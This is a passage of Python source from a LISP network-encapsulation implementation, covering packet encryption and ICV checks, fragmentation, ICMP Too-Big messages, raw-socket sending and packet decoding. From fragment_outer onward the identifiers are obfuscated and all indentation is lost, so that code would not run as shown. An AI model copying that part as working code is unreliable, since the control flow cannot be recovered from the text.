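    # size, so for example a 50-byte inner packet grows to 64 bytes before
    # encryption and len(cipher_pad(packet)) % 16 is always 0.
    #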
    def encrypt(self, key, addr_str):
        if (key == None or key.shared_key == None):
            return([self.packet, False])

        #
        # Pad to the cipher block size, get an IV, and pick the cipher
        # according to the negotiated cipher suite.
        #
        packet = self.cipher_pad(self.packet)
        iv = key.get_iv()

        ts = lisp_get_timestamp()
        digest = None
        if (key.cipher_suite == LISP_CS_25519_CHACHA):
            encrypt = chacha.ChaCha(key.encrypt_key, iv).encrypt
        elif (key.cipher_suite == LISP_CS_25519_GCM):
            aes_key = binascii.unhexlify(key.encrypt_key)
            try:
                gcm = AES.new(aes_key, AES.MODE_GCM, iv)
                encrypt = gcm.encrypt
                digest = gcm.digest
            except:
                lprint("You need AES-GCM, do a 'pip install pycryptodome'")
                return([self.packet, False])
        else:
            aes_key = binascii.unhexlify(key.encrypt_key)
            encrypt = AES.new(aes_key, AES.MODE_CBC, iv).encrypt

        ciphertext = encrypt(packet)
        if (ciphertext == None): return([self.packet, False])
        ts = int(str(time.time() - ts).split(".")[1][0:6])

        #
        # GCM appends its authentication tag to the ciphertext.
        #
        if (digest != None): ciphertext += digest()

        #
        # Compute the ICV over the LISP header, IV, and ciphertext.
        #
        self.lisp_header.key_id(key.key_id)
        lisp = self.lisp_header.encode()

        icv = key.do_icv(lisp + iv + ciphertext, iv)

        icv_len = 4 if (key.do_poly) else 8

        encrypt_str = bold("Encrypt", False)
        cipher_str = bold(key.cipher_suite_string, False)
        addr_str = "RLOC: " + red(addr_str, False)
        hash_str = "poly" if key.do_poly else "sha256"
        hash_str = bold(hash_str, False)
        icv_str = "ICV({}): 0x{}...{}".format(hash_str, icv[0:icv_len],
            icv[-icv_len::])
        dprint("{} for key-id: {}, {}, {}, {}-time: {} usec".format(
            encrypt_str, key.key_id, addr_str, icv_str, cipher_str, ts))

        #
        # Pack the ICV into network byte order: 16 bytes for poly1305, 20
        # bytes for sha256-160.
        #
        icv = int(icv, 16)
        if (key.do_poly):
            icv1 = byte_swap_64((icv >> 64) & LISP_8_64_MASK)
            icv2 = byte_swap_64(icv & LISP_8_64_MASK)
            icv = struct.pack("QQ", icv1, icv2)
        else:
            icv1 = byte_swap_64((icv >> 96) & LISP_8_64_MASK)
            icv2 = byte_swap_64((icv >> 32) & LISP_8_64_MASK)
            icv3 = socket.htonl(icv & 0xffffffff)
            icv = struct.pack("QQI", icv1, icv2, icv3)

        return([iv + ciphertext + icv, True])
    def decrypt(self, packet, header_length, key, addr_str):
        #
        # Strip the trailing ICV: 16 bytes for poly1305, 20 bytes for
        # sha256.
        #
        if (key.do_poly):
            icv1, icv2 = struct.unpack("QQ", packet[-16::])
            packet_icv = byte_swap_64(icv1) << 64
            packet_icv |= byte_swap_64(icv2)
            packet_icv = lisp_hex_string(packet_icv).zfill(32)
            packet = packet[0:-16]
            icv_len = 4
            hash_str = bold("poly", False)
        else:
            icv1, icv2, icv3 = struct.unpack("QQI", packet[-20::])
            packet_icv = byte_swap_64(icv1) << 96
            packet_icv |= byte_swap_64(icv2) << 32
            packet_icv |= socket.htonl(icv3)
            packet_icv = lisp_hex_string(packet_icv).zfill(40)
            packet = packet[0:-20]
            icv_len = 8
            hash_str = bold("sha", False)

        lisp = self.lisp_header.encode()

        #
        # The IV length depends on the cipher suite.
        #
        if (key.cipher_suite == LISP_CS_25519_CHACHA):
            iv_len = 8
            cipher_str = bold("chacha", False)
        elif (key.cipher_suite == LISP_CS_25519_GCM):
            iv_len = 12
            cipher_str = bold("aes-gcm", False)
        else:
            iv_len = 16
            cipher_str = bold("aes-cbc", False)

        iv = packet[0:iv_len]

        #
        # Recompute the ICV over the LISP header, IV, and ciphertext and
        # compare with what arrived in the packet.
        #
        computed_icv = key.do_icv(lisp + packet, iv)

        p_icv = "0x{}...{}".format(packet_icv[0:icv_len],
            packet_icv[-icv_len::])
        c_icv = "0x{}...{}".format(computed_icv[0:icv_len],
            computed_icv[-icv_len::])

        if (computed_icv != packet_icv):
            self.packet_error = "ICV-error"
            cs = cipher_str + "/" + hash_str
            fail_str = bold("ICV failed ({})".format(cs), False)
            icv_str = "packet-ICV {} != computed-ICV {}".format(p_icv, c_icv)
            dprint(("{} from RLOC {}, receive-port: {}, key-id: {}, " + \
                "packet dropped, {}").format(fail_str, red(addr_str, False),
                self.udp_sport, key.key_id, icv_str))
            dprint("{}".format(key.print_keys()))

            #
            # The encapsulator may have rekeyed; try the other stored keys
            # for this RLOC.
            #
            lisp_retry_decap_keys(addr_str, lisp + packet, iv, packet_icv)
            return([None, False])

        #
        # Strip the IV and decrypt with the negotiated cipher.
        #
        packet = packet[iv_len::]

        ts = lisp_get_timestamp()
        if (key.cipher_suite == LISP_CS_25519_CHACHA):
            decrypt = chacha.ChaCha(key.encrypt_key, iv).decrypt
        elif (key.cipher_suite == LISP_CS_25519_GCM):
            aes_key = binascii.unhexlify(key.encrypt_key)
            try:
                decrypt = AES.new(aes_key, AES.MODE_GCM, iv).decrypt
            except:
                self.packet_error = "no-decrypt-key"
                lprint("You need AES-GCM, do a 'pip install pycryptodome'")
                return([None, False])
        else:
            if ((len(packet) % 16) != 0):
                dprint("Ciphertext not multiple of 16 bytes, packet dropped")
                return([None, False])
            aes_key = binascii.unhexlify(key.encrypt_key)
            decrypt = AES.new(aes_key, AES.MODE_CBC, iv).decrypt

        plaintext = decrypt(packet)
        ts = int(str(time.time() - ts).split(".")[1][0:6])

        decrypt_str = bold("Decrypt", False)
        addr_str = "RLOC: " + red(addr_str, False)
        hash_str = "poly" if key.do_poly else "sha256"
        hash_str = bold(hash_str, False)
        icv_str = "ICV({}): {}".format(hash_str, p_icv)
        dprint("{} for key-id: {}, {}, {} (good), {}-time: {} usec".format(
            decrypt_str, key.key_id, addr_str, icv_str, cipher_str, ts))

        #
        # Keep the outer headers and return the decrypted inner packet.
        #
        self.packet = self.packet[0:header_length]
        return([plaintext, True])
def fragment_outer ( self , outer_hdr , inner_packet ) :
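#
# fragment_outer
#
# Split the inner packet into fixed 1000-byte pieces and prepend a copy
# of the (IPv4) outer header to each one, setting the more-fragments bit
# (0x2000) and the fragment offset in 8-byte units, then recomputing the
# total-length field and header checksum per fragment. Returns the list
# of fragments.
#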
o0000oO = 1000
IiIIii = [ ]
OoO00oo00 = 0
IiiI1iii1iIiiI = len ( inner_packet )
while ( OoO00oo00 < IiiI1iii1iIiiI ) :
ii11I = inner_packet [ OoO00oo00 : : ]
if ( len ( ii11I ) > o0000oO ) : ii11I = ii11I [ 0 : o0000oO ]
IiIIii . append ( ii11I )
OoO00oo00 += len ( ii11I )
I1Ii1iIIiiiIi = [ ]
OoO00oo00 = 0
for ii11I in IiIIii :
oo00o00O0 = OoO00oo00 if ( ii11I == IiIIii [ - 1 ] ) else 0x2000 + OoO00oo00
oo00o00O0 = socket . htons ( oo00o00O0 )
outer_hdr = outer_hdr [ 0 : 6 ] + struct . pack ( "H" , oo00o00O0 ) + outer_hdr [ 8 : : ]
I11iIi1i1I1i1 = socket . htons ( len ( ii11I ) + 20 )
outer_hdr = outer_hdr [ 0 : 2 ] + struct . pack ( "H" , I11iIi1i1I1i1 ) + outer_hdr [ 4 : : ]
outer_hdr = lisp_ip_checksum ( outer_hdr )
I1Ii1iIIiiiIi . append ( outer_hdr + ii11I )
OoO00oo00 += len ( ii11I ) / 8
return ( I1Ii1iIIiiiIi )
def send_icmp_too_big ( self , inner_packet ) :
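#
# send_icmp_too_big
#
# Send an ICMP Destination-Unreachable/Fragmentation-Needed (type 3,
# code 4) message with a next-hop MTU of 1400 back to the inner source,
# rate-limited by LISP_ICMP_TOO_BIG_RATE_LIMIT. Returns True when the
# message was sent and False when rate-limited or the raw send failed.
#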
global lisp_last_icmp_too_big_sent
global lisp_icmp_raw_socket
oO000o0Oo00 = time . time ( ) - lisp_last_icmp_too_big_sent
if ( oO000o0Oo00 < LISP_ICMP_TOO_BIG_RATE_LIMIT ) :
lprint ( "Rate limit sending ICMP Too-Big to {}" . format ( self . inner_source . print_address_no_iid ( ) ) )
return ( False )
ooOO = socket . htons ( 1400 )
O00ooooo00 = struct . pack ( "BBHHH" , 3 , 4 , 0 , 0 , ooOO )
O00ooooo00 += inner_packet [ 0 : 20 + 8 ]
O00ooooo00 = lisp_icmp_checksum ( O00ooooo00 )
iiII1 = inner_packet [ 12 : 16 ]
oo0OoO = self . inner_source . print_address_no_iid ( )
iIIi1iii1 = self . outer_source . pack_address ( )
IiI = socket . htons ( 20 + 36 )
Ooo0oO = struct . pack ( "BBHHHBBH" , 0x45 , 0 , IiI , 0 , 0 , 32 , 1 , 0 ) + iIIi1iii1 + iiII1
Ooo0oO = lisp_ip_checksum ( Ooo0oO )
Ooo0oO = self . fix_outer_header ( Ooo0oO )
Ooo0oO += O00ooooo00
iii11 = bold ( "Too-Big" , False )
lprint ( "Send ICMP {} to {}, mtu 1400: {}" . format ( iii11 , oo0OoO ,
lisp_format_packet ( Ooo0oO ) ) )
try :
lisp_icmp_raw_socket . sendto ( Ooo0oO , ( oo0OoO , 0 ) )
except socket . error as oOo :
lprint ( "lisp_icmp_raw_socket.sendto() failed: {}" . format ( oOo ) )
return ( False )
lisp_last_icmp_too_big_sent = lisp_get_timestamp ( )
return ( True )
def fragment ( self ) :
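#
# fragment
#
# Fragment an encapsulated packet that exceeds 1500 bytes. A non-IPv4
# inner packet is fragmented on the outer header. For an IPv4 inner
# packet the DF bit is honored (send ICMP Too-Big, or clear DF when
# lisp_ignore_df_bit is set); otherwise the inner payload is split into
# 1400-byte pieces and the inner and outer headers are rebuilt for each
# fragment. Returns (fragment-list, reason-string).
#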
global lisp_icmp_raw_socket
global lisp_ignore_df_bit
IiiiIi1iiii11 = self . fix_outer_header ( self . packet )
IiiI1iii1iIiiI = len ( IiiiIi1iiii11 )
if ( IiiI1iii1iIiiI <= 1500 ) : return ( [ IiiiIi1iiii11 ] , "Fragment-None" )
IiiiIi1iiii11 = self . packet
if ( self . inner_version != 4 ) :
i11iiI = random . randint ( 0 , 0xffff )
IiiiI11 = IiiiIi1iiii11 [ 0 : 4 ] + struct . pack ( "H" , i11iiI ) + IiiiIi1iiii11 [ 6 : 20 ]
OoooOOo0oOO = IiiiIi1iiii11 [ 20 : : ]
I1Ii1iIIiiiIi = self . fragment_outer ( IiiiI11 , OoooOOo0oOO )
return ( I1Ii1iIIiiiIi , "Fragment-Outer" )
iIiiiII11 = 56 if ( self . outer_version == 6 ) else 36
IiiiI11 = IiiiIi1iiii11 [ 0 : iIiiiII11 ]
ooo00Oo0 = IiiiIi1iiii11 [ iIiiiII11 : iIiiiII11 + 20 ]
OoooOOo0oOO = IiiiIi1iiii11 [ iIiiiII11 + 20 : : ]
iiIII1i1 = struct . unpack ( "H" , ooo00Oo0 [ 6 : 8 ] ) [ 0 ]
iiIII1i1 = socket . ntohs ( iiIII1i1 )
if ( iiIII1i1 & 0x4000 ) :
if ( lisp_icmp_raw_socket != None ) :
oOOo0OOoOO0 = IiiiIi1iiii11 [ iIiiiII11 : : ]
if ( self . send_icmp_too_big ( oOOo0OOoOO0 ) ) : return ( [ ] , None )
if ( lisp_ignore_df_bit ) :
iiIII1i1 &= ~ 0x4000
else :
ii1IIIi = bold ( "DF-bit set" , False )
dprint ( "{} in inner header, packet discarded" . format ( ii1IIIi ) )
return ( [ ] , "Fragment-None-DF-bit" )
OoO00oo00 = 0
IiiI1iii1iIiiI = len ( OoooOOo0oOO )
I1Ii1iIIiiiIi = [ ]
while ( OoO00oo00 < IiiI1iii1iIiiI ) :
I1Ii1iIIiiiIi . append ( OoooOOo0oOO [ OoO00oo00 : OoO00oo00 + 1400 ] )
OoO00oo00 += 1400
IiIIii = I1Ii1iIIiiiIi
I1Ii1iIIiiiIi = [ ]
oOooooooO0o = True if iiIII1i1 & 0x2000 else False
iiIII1i1 = ( iiIII1i1 & 0x1fff ) * 8
for ii11I in IiIIii :
OO00O00o0O = iiIII1i1 / 8
if ( oOooooooO0o ) :
OO00O00o0O |= 0x2000
elif ( ii11I != IiIIii [ - 1 ] ) :
OO00O00o0O |= 0x2000
OO00O00o0O = socket . htons ( OO00O00o0O )
ooo00Oo0 = ooo00Oo0 [ 0 : 6 ] + struct . pack ( "H" , OO00O00o0O ) + ooo00Oo0 [ 8 : : ]
IiiI1iii1iIiiI = len ( ii11I )
iiIII1i1 += IiiI1iii1iIiiI
I11iIi1i1I1i1 = socket . htons ( IiiI1iii1iIiiI + 20 )
ooo00Oo0 = ooo00Oo0 [ 0 : 2 ] + struct . pack ( "H" , I11iIi1i1I1i1 ) + ooo00Oo0 [ 4 : 10 ] + struct . pack ( "H" , 0 ) + ooo00Oo0 [ 12 : : ]
ooo00Oo0 = lisp_ip_checksum ( ooo00Oo0 )
II11II = ooo00Oo0 + ii11I
IiiI1iii1iIiiI = len ( II11II )
if ( self . outer_version == 4 ) :
I11iIi1i1I1i1 = IiiI1iii1iIiiI + iIiiiII11
IiiI1iii1iIiiI += 16
IiiiI11 = IiiiI11 [ 0 : 2 ] + struct . pack ( "H" , I11iIi1i1I1i1 ) + IiiiI11 [ 4 : : ]
IiiiI11 = lisp_ip_checksum ( IiiiI11 )
II11II = IiiiI11 + II11II
II11II = self . fix_outer_header ( II11II )
II1 = iIiiiII11 - 12
I11iIi1i1I1i1 = socket . htons ( IiiI1iii1iIiiI )
II11II = II11II [ 0 : II1 ] + struct . pack ( "H" , I11iIi1i1I1i1 ) + II11II [ II1 + 2 : : ]
I1Ii1iIIiiiIi . append ( II11II )
return ( I1Ii1iIIiiiIi , "Fragment-Inner" )
def fix_outer_header ( self , packet ) :
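#
# fix_outer_header
#
# Byte-swap the IPv4 total-length field (and on macOS the fragment
# field as well) before a raw-socket send. This appears to compensate
# for raw sockets that expect these fields in host rather than network
# byte order.
#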
if ( self . outer_version == 4 or self . inner_version == 4 ) :
if ( lisp_is_macos ( ) ) :
packet = packet [ 0 : 2 ] + packet [ 3 ] + packet [ 2 ] + packet [ 4 : 6 ] + packet [ 7 ] + packet [ 6 ] + packet [ 8 : : ]
else :
packet = packet [ 0 : 2 ] + packet [ 3 ] + packet [ 2 ] + packet [ 4 : : ]
return ( packet )
def send_packet ( self , lisp_raw_socket , dest ) :
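#
# send_packet
#
# Fragment when necessary and transmit each piece to 'dest' on the
# supplied raw socket, printing per-fragment detail when more than one
# fragment was produced.
#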
if ( lisp_flow_logging and dest != self . inner_dest ) : self . log_flow ( True )
dest = dest . print_address_no_iid ( )
I1Ii1iIIiiiIi , ooO = self . fragment ( )
for II11II in I1Ii1iIIiiiIi :
if ( len ( I1Ii1iIIiiiIi ) != 1 ) :
self . packet = II11II
self . print_packet ( ooO , True )
try : lisp_raw_socket . sendto ( II11II , ( dest , 0 ) )
except socket . error as oOo :
lprint ( "socket.sendto() failed: {}" . format ( oOo ) )
def send_l2_packet ( self , l2_socket , mac_header ) :
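#
# send_l2_packet
#
# Transmit an IPv6 packet on the layer-2 tap device by prepending the
# caller-supplied MAC header; the packet is dropped when no layer-2
# socket or MAC header is available.
#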
if ( l2_socket == None ) :
lprint ( "No layer-2 socket, drop IPv6 packet" )
return
if ( mac_header == None ) :
lprint ( "Could not build MAC header, drop IPv6 packet" )
return
IiiiIi1iiii11 = mac_header + self . packet
l2_socket . write ( IiiiIi1iiii11 )
return
def bridge_l2_packet ( self , eid , db ) :
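#
# bridge_l2_packet
#
# Bridge a layer-2 frame out the interface associated with a dynamic
# EID; any failed lookup along the way silently drops the frame.
#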
try : I1iIi1IiI1i = db . dynamic_eids [ eid . print_address_no_iid ( ) ]
except : return
try : II1i = lisp_myinterfaces [ I1iIi1IiI1i . interface ]
except : return
#
# Keep the bridge socket in a local name that does not shadow the
# socket module, so the 'socket . error' reference in the except
# clause below resolves correctly.
#
try :
bridge_socket = II1i . get_bridge_socket ( )
if ( bridge_socket == None ) : return
except : return

try : bridge_socket . send ( self . packet )
except socket . error as oOo :
lprint ( "bridge_l2_packet(): socket.send() failed: {}" . format ( oOo ) )
def is_lisp_packet ( self , packet ) :
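#
# is_lisp_packet
#
# Return True when an IPv4 packet is LISP encapsulated: the protocol
# must be UDP and either the source or destination port must be the
# LISP data port (4341).
#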
o0oOo00 = ( struct . unpack ( "B" , packet [ 9 ] ) [ 0 ] == LISP_UDP_PROTOCOL )
if ( o0oOo00 == False ) : return ( False )
Oo0O00O = struct . unpack ( "H" , packet [ 22 : 24 ] ) [ 0 ]
if ( socket . ntohs ( Oo0O00O ) == LISP_DATA_PORT ) : return ( True )
Oo0O00O = struct . unpack ( "H" , packet [ 20 : 22 ] ) [ 0 ]
if ( socket . ntohs ( Oo0O00O ) == LISP_DATA_PORT ) : return ( True )
return ( False )
def decode ( self , is_lisp_packet , lisp_ipc_socket , stats ) :
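#
# decode
#
# Parse and validate an encapsulated packet in place: check the outer
# IPv4/IPv6 header, UDP fields, and LISP header, decrypt the inner
# packet when the key-id bits are set, then extract the inner
# addresses, ports, tos, and ttl. Returns self on success and None on
# any error, incrementing the matching 'stats' counter and logging the
# flow when enabled.
#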
self . packet_error = ""
IiiiIi1iiii11 = self . packet
oO0oO00 = len ( IiiiIi1iiii11 )
IiiI1Ii1II = OO0oIii1I1I = True
O0oo0ooO00 = 0
o0OoO0000o = 0
if ( is_lisp_packet ) :
o0OoO0000o = self . lisp_header . get_instance_id ( )
oOoO0 = struct . unpack ( "B" , IiiiIi1iiii11 [ 0 : 1 ] ) [ 0 ]
self . outer_version = oOoO0 >> 4
if ( self . outer_version == 4 ) :
O0000 = struct . unpack ( "H" , IiiiIi1iiii11 [ 10 : 12 ] ) [ 0 ]
IiiiIi1iiii11 = lisp_ip_checksum ( IiiiIi1iiii11 )
Oo0 = struct . unpack ( "H" , IiiiIi1iiii11 [ 10 : 12 ] ) [ 0 ]
if ( Oo0 != 0 ) :
if ( O0000 != 0 or lisp_is_macos ( ) == False ) :
self . packet_error = "checksum-error"
if ( stats ) :
stats [ self . packet_error ] . increment ( oO0oO00 )
lprint ( "IPv4 header checksum failed for outer header" )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
O0ooo0 = LISP_AFI_IPV4
OoO00oo00 = 12
self . outer_tos = struct . unpack ( "B" , IiiiIi1iiii11 [ 1 : 2 ] ) [ 0 ]
self . outer_ttl = struct . unpack ( "B" , IiiiIi1iiii11 [ 8 : 9 ] ) [ 0 ]
O0oo0ooO00 = 20
elif ( self . outer_version == 6 ) :
O0ooo0 = LISP_AFI_IPV6
OoO00oo00 = 8
o0Oo00o0 = struct . unpack ( "H" , IiiiIi1iiii11 [ 0 : 2 ] ) [ 0 ]
self . outer_tos = ( socket . ntohs ( o0Oo00o0 ) >> 4 ) & 0xff
self . outer_ttl = struct . unpack ( "B" , IiiiIi1iiii11 [ 7 : 8 ] ) [ 0 ]
O0oo0ooO00 = 40
else :
self . packet_error = "outer-header-error"
if ( stats ) : stats [ self . packet_error ] . increment ( oO0oO00 )
lprint ( "Cannot decode outer header" )
return ( None )
self . outer_source . afi = O0ooo0
self . outer_dest . afi = O0ooo0
Iii1i11 = self . outer_source . addr_length ( )
self . outer_source . unpack_address ( IiiiIi1iiii11 [ OoO00oo00 : OoO00oo00 + Iii1i11 ] )
OoO00oo00 += Iii1i11
self . outer_dest . unpack_address ( IiiiIi1iiii11 [ OoO00oo00 : OoO00oo00 + Iii1i11 ] )
IiiiIi1iiii11 = IiiiIi1iiii11 [ O0oo0ooO00 : : ]
self . outer_source . mask_len = self . outer_source . host_mask_len ( )
self . outer_dest . mask_len = self . outer_dest . host_mask_len ( )
IIiIIiiiiiII1 = struct . unpack ( "H" , IiiiIi1iiii11 [ 0 : 2 ] ) [ 0 ]
self . udp_sport = socket . ntohs ( IIiIIiiiiiII1 )
IIiIIiiiiiII1 = struct . unpack ( "H" , IiiiIi1iiii11 [ 2 : 4 ] ) [ 0 ]
self . udp_dport = socket . ntohs ( IIiIIiiiiiII1 )
IIiIIiiiiiII1 = struct . unpack ( "H" , IiiiIi1iiii11 [ 4 : 6 ] ) [ 0 ]
self . udp_length = socket . ntohs ( IIiIIiiiiiII1 )
IIiIIiiiiiII1 = struct . unpack ( "H" , IiiiIi1iiii11 [ 6 : 8 ] ) [ 0 ]
self . udp_checksum = socket . ntohs ( IIiIIiiiiiII1 )
IiiiIi1iiii11 = IiiiIi1iiii11 [ 8 : : ]
IiiI1Ii1II = ( self . udp_dport == LISP_DATA_PORT or
self . udp_sport == LISP_DATA_PORT )
OO0oIii1I1I = ( self . udp_dport in ( LISP_L2_DATA_PORT , LISP_VXLAN_DATA_PORT ) )
if ( self . lisp_header . decode ( IiiiIi1iiii11 ) == False ) :
self . packet_error = "lisp-header-error"
if ( stats ) : stats [ self . packet_error ] . increment ( oO0oO00 )
if ( lisp_flow_logging ) : self . log_flow ( False )
lprint ( "Cannot decode LISP header" )
return ( None )
IiiiIi1iiii11 = IiiiIi1iiii11 [ 8 : : ]
o0OoO0000o = self . lisp_header . get_instance_id ( )
O0oo0ooO00 += 16
if ( o0OoO0000o == 0xffffff ) : o0OoO0000o = 0
O00oo0o0o0oo = False
I1I1I1 = self . lisp_header . k_bits
if ( I1I1I1 ) :
oo0o00OO = lisp_get_crypto_decap_lookup_key ( self . outer_source ,
self . udp_sport )
if ( oo0o00OO == None ) :
self . packet_error = "no-decrypt-key"
if ( stats ) : stats [ self . packet_error ] . increment ( oO0oO00 )
self . print_packet ( "Receive" , is_lisp_packet )
oOOoOO = bold ( "No key available" , False )
dprint ( "{} for key-id {} to decrypt packet" . format ( oOOoOO , I1I1I1 ) )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
Oo000O000 = lisp_crypto_keys_by_rloc_decap [ oo0o00OO ] [ I1I1I1 ]
if ( Oo000O000 == None ) :
self . packet_error = "no-decrypt-key"
if ( stats ) : stats [ self . packet_error ] . increment ( oO0oO00 )
self . print_packet ( "Receive" , is_lisp_packet )
oOOoOO = bold ( "No key available" , False )
dprint ( "{} to decrypt packet from RLOC {}" . format ( oOOoOO ,
red ( oo0o00OO , False ) ) )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
Oo000O000 . use_count += 1
IiiiIi1iiii11 , O00oo0o0o0oo = self . decrypt ( IiiiIi1iiii11 , O0oo0ooO00 , Oo000O000 ,
oo0o00OO )
if ( O00oo0o0o0oo == False ) :
if ( stats ) : stats [ self . packet_error ] . increment ( oO0oO00 )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
oOoO0 = struct . unpack ( "B" , IiiiIi1iiii11 [ 0 : 1 ] ) [ 0 ]
self . inner_version = oOoO0 >> 4
if ( IiiI1Ii1II and self . inner_version == 4 and oOoO0 >= 0x45 ) :
iIi1Iii1 = socket . ntohs ( struct . unpack ( "H" , IiiiIi1iiii11 [ 2 : 4 ] ) [ 0 ] )
self . inner_tos = struct . unpack ( "B" , IiiiIi1iiii11 [ 1 : 2 ] ) [ 0 ]
self . inner_ttl = struct . unpack ( "B" , IiiiIi1iiii11 [ 8 : 9 ] ) [ 0 ]
self . inner_protocol = struct . unpack ( "B" , IiiiIi1iiii11 [ 9 : 10 ] ) [ 0 ]
self . inner_source . afi = LISP_AFI_IPV4
self . inner_dest . afi = LISP_AFI_IPV4
self . inner_source . unpack_address ( IiiiIi1iiii11 [ 12 : 16 ] )
self . inner_dest . unpack_address ( IiiiIi1iiii11 [ 16 : 20 ] )
iiIII1i1 = socket . ntohs ( struct . unpack ( "H" , IiiiIi1iiii11 [ 6 : 8 ] ) [ 0 ] )
# MF set or a nonzero offset marks a fragment; mask out DF (0x4000) so
# DF-only packets are not misclassified as fragments.
self . inner_is_fragment = ( iiIII1i1 & 0x2000 or ( iiIII1i1 & 0x1fff ) != 0 )
if ( self . inner_protocol == LISP_UDP_PROTOCOL ) :
self . inner_sport = struct . unpack ( "H" , IiiiIi1iiii11 [ 20 : 22 ] ) [ 0 ]
self . inner_sport = socket . ntohs ( self . inner_sport )
self . inner_dport = struct . unpack ( "H" , IiiiIi1iiii11 [ 22 : 24 ] ) [ 0 ]
self . inner_dport = socket . ntohs ( self . inner_dport )
elif ( IiiI1Ii1II and self . inner_version == 6 and oOoO0 >= 0x60 ) :
iIi1Iii1 = socket . ntohs ( struct . unpack ( "H" , IiiiIi1iiii11 [ 4 : 6 ] ) [ 0 ] ) + 40
o0Oo00o0 = struct . unpack ( "H" , IiiiIi1iiii11 [ 0 : 2 ] ) [ 0 ]
self . inner_tos = ( socket . ntohs ( o0Oo00o0 ) >> 4 ) & 0xff
self . inner_ttl = struct . unpack ( "B" , IiiiIi1iiii11 [ 7 : 8 ] ) [ 0 ]
self . inner_protocol = struct . unpack ( "B" , IiiiIi1iiii11 [ 6 : 7 ] ) [ 0 ]
self . inner_source . afi = LISP_AFI_IPV6
self . inner_dest . afi = LISP_AFI_IPV6
self . inner_source . unpack_address ( IiiiIi1iiii11 [ 8 : 24 ] )
self . inner_dest . unpack_address ( IiiiIi1iiii11 [ 24 : 40 ] )
if ( self . inner_protocol == LISP_UDP_PROTOCOL ) :
self . inner_sport = struct . unpack ( "H" , IiiiIi1iiii11 [ 40 : 42 ] ) [ 0 ]
self . inner_sport = socket . ntohs ( self . inner_sport )
self . inner_dport = struct . unpack ( "H" , IiiiIi1iiii11 [ 42 : 44 ] ) [ 0 ]
self . inner_dport = socket . ntohs ( self . inner_dport )
elif ( OO0oIii1I1I ) :
iIi1Iii1 = len ( IiiiIi1iiii11 )
self . inner_tos = 0
self . inner_ttl = 0
self . inner_protocol = 0
self . inner_source . afi = LISP_AFI_MAC
self . inner_dest . afi = LISP_AFI_MAC
self . inner_dest . unpack_address ( self . swap_mac ( IiiiIi1iiii11 [ 0 : 6 ] ) )
self . inner_source . unpack_address ( self . swap_mac ( IiiiIi1iiii11 [ 6 : 12 ] ) )
elif ( self . lisp_header . get_instance_id ( ) == 0xffffff ) :
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( self )
else :
self . packet_error = "bad-inner-version"
if ( stats ) : stats [ self . packet_error ] . increment ( oO0oO00 )
lprint ( "Cannot decode encapsulation, header version {}" . format ( hex ( oOoO0 ) ) )
IiiiIi1iiii11 = lisp_format_packet ( IiiiIi1iiii11 [ 0 : 20 ] )
lprint ( "Packet header: {}" . format ( IiiiIi1iiii11 ) )
if ( lisp_flow_logging and is_lisp_packet ) : self . log_flow ( False )
return ( None )
self . inner_source . mask_len = self . inner_source . host_mask_len ( )
self . inner_dest . mask_len = self . inner_dest . host_mask_len ( )
self . inner_source . instance_id = o0OoO0000o
self . inner_dest . instance_id = o0OoO0000o
if ( lisp_nonce_echoing and is_lisp_packet ) :
ii1 = lisp_get_echo_nonce ( self . outer_source , None )
if ( ii1 == None ) :
o0oooOoOoOo = self . outer_source . print_address_no_iid ( )
ii1 = lisp_echo_nonce ( o0oooOoOoOo )
Iii11I = self . lisp_header . get_nonce ( )
if ( self . lisp_header . is_e_bit_set ( ) ) :
ii1 . receive_request ( lisp_ipc_socket , Iii11I )
elif ( ii1 . request_nonce_sent ) :
ii1 . receive_echo ( lisp_ipc_socket , Iii11I )
if ( O00oo0o0o0oo ) : self . packet += IiiiIi1iiii11 [ : iIi1Iii1 ]
if ( lisp_flow_logging and is_lisp_packet ) : self . log_flow ( False )
return ( self )
def swap_mac ( self , mac ) :
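# Swap the bytes of each 16-bit word of a MAC address, converting
# between wire order and the internal byte order used elsewhere in
# this file.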
return ( mac [ 1 ] + mac [ 0 ] + mac [ 3 ] + mac [ 2 ] + mac [ 5 ] + mac [ 4 ] )
def strip_outer_headers ( self ) :
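# Remove the outer IP header (20 or 40 bytes) plus the UDP and LISP
# headers (8 bytes each), leaving the inner packet.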
OoO00oo00 = 16
OoO00oo00 += 20 if ( self . outer_version == 4 ) else 40
self . packet = self . packet [ OoO00oo00 : : ]
return ( self )
def hash_ports ( self ) :
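#
# hash_ports
#
# Fold the inner transport protocol and the 32-bit source/dest port
# word into a 16-bit value; fragments hash on the protocol alone since
# only the first fragment carries the port fields.
#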
IiiiIi1iiii11 = self . packet
oOoO0 = self . inner_version
IIi1iiIIi1i = 0
if ( oOoO0 == 4 ) :
ii1I = struct . unpack ( "B" , IiiiIi1iiii11 [ 9 ] ) [ 0 ]
if ( self . inner_is_fragment ) : return ( ii1I )
if ( ii1I in [ 6 , 17 ] ) :
IIi1iiIIi1i = ii1I
IIi1iiIIi1i += struct . unpack ( "I" , IiiiIi1iiii11 [ 20 : 24 ] ) [ 0 ]
IIi1iiIIi1i = ( IIi1iiIIi1i >> 16 ) ^ ( IIi1iiIIi1i & 0xffff )
if ( oOoO0 == 6 ) :
ii1I = struct . unpack ( "B" , IiiiIi1iiii11 [ 6 ] ) [ 0 ]
if ( ii1I in [ 6 , 17 ] ) :
IIi1iiIIi1i = ii1I
IIi1iiIIi1i += struct . unpack ( "I" , IiiiIi1iiii11 [ 40 : 44 ] ) [ 0 ]
IIi1iiIIi1i = ( IIi1iiIIi1i >> 16 ) ^ ( IIi1iiIIi1i & 0xffff )
return ( IIi1iiIIi1i )
def hash_packet ( self ) :
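#
# hash_packet
#
# Hash the inner source/dest addresses and ports down to 12 bits and
# store the result in the UDP source port (0xf000-0xffff) so that
# multipath routers can load-split encapsulated flows.
#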
IIi1iiIIi1i = self . inner_source . address ^ self . inner_dest . address
IIi1iiIIi1i += self . hash_ports ( )
if ( self . inner_version == 4 ) :
IIi1iiIIi1i = ( IIi1iiIIi1i >> 16 ) ^ ( IIi1iiIIi1i & 0xffff )
elif ( self . inner_version == 6 ) :
IIi1iiIIi1i = ( IIi1iiIIi1i >> 64 ) ^ ( IIi1iiIIi1i & 0xffffffffffffffff )
IIi1iiIIi1i = ( IIi1iiIIi1i >> 32 ) ^ ( IIi1iiIIi1i & 0xffffffff )
